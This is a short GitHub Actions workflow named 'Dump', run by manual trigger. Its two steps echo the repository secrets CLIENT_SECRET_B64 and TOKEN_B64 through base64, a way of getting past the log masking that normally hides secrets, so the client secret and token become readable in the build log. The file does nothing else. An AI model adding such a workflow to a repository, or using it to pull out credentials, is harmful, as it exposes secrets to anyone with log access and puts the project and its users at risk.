name: Dump
on: [workflow_dispatch]
jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ secrets.CLIENT_SECRET_B64 }}" | base64
      - run: echo "${{ secrets.TOKEN_B64 }}" | base64
